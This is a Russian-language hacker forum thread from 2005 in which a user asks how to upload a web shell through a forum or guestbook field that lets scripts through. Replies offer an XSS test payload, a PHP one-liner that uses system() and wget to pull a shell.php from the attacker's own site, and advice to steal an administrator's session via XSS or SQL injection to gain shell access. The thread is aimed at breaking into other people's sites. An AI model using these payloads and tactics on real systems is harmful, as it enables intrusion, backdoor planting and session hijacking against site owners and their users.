Заливка шелла

Discussion in 'PHP' started by T-4, 9 Dec 2005.

  1. T-4

    T-4 New Member

    Joined:
    1 Nov 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    -1
    Как залить шелл, если одно из полей для ввода (допустим на каком-нибудь форуме или гостевой) пропускает определённые символы (короче можно скрипты вставлять) ?
     
  2. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Ты неправельно понял (или я тебя).
    Скрипт ДОЛЖЕН загружать файлы. А если он пропускает какие-то символы, например при постинге сообщения в гостевой, то это тебе ничего не даёт, кроме xss||sql inj
     
  3. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    Сморя какой там скрипт:) Возможно там есть php иньекция и ты не прав тогда:)Ссылку давай поглядим так на вскидку сказать не чего не могу.
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    не думаю что в жаба скрипте буит пхп инъекция)))))))))))))
    T-4 а ты введи <script>alert('Hacked by me!');</script>
    и наслаждайся=)
     
  5. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Ссылку в студию. :]
     
  6. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил.
     
    _________________________
  7. [504]

    [504] New Member

    Joined:
    6 Dec 2005
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    NaX[no]r† :: " Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил."

    =)))))
    вопрос читал не)))
    Как залить шелл?

    вот код на PHP

    <? system("cd ../../;wget http://...../shell.php"); ?>

    cd ../../ - папка куда залить..
    wget - качалка. взависимости еcть ли он на серве..
    может быть lynx и т.д.
    http://...../shell.php - твой сайт с php-шеллом

    А впринципе если *nux знаешь сам напишешь)))
     
    1 person likes this.
  8. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    2 [504]
    Про возможность выполнения команд на сервере тут ничего не говорилось, а говорилось тут о
    :D

    Вообщем к сабжу. Как не старайся, но если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
    Поэтому топикСтартеру советую рулить в сторону xss || sql inj, дабы заполучить "кусочек" админа, поставить себе этот кусочек и самому стать админом, а у админа больше прав, там уже и до шела не далеко :p
     
  9. BymeR

    BymeR Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    34
    Likes Received:
    9
    Reputations:
    1
    Ты бы ссылку дал мы бы конкретнее посоветовали...
    Действительно проще всего сейчас sql inj и какое нить поле создать(если то что ты хакаешь такое позволяет) чат php.sbp.ru например да...И всё...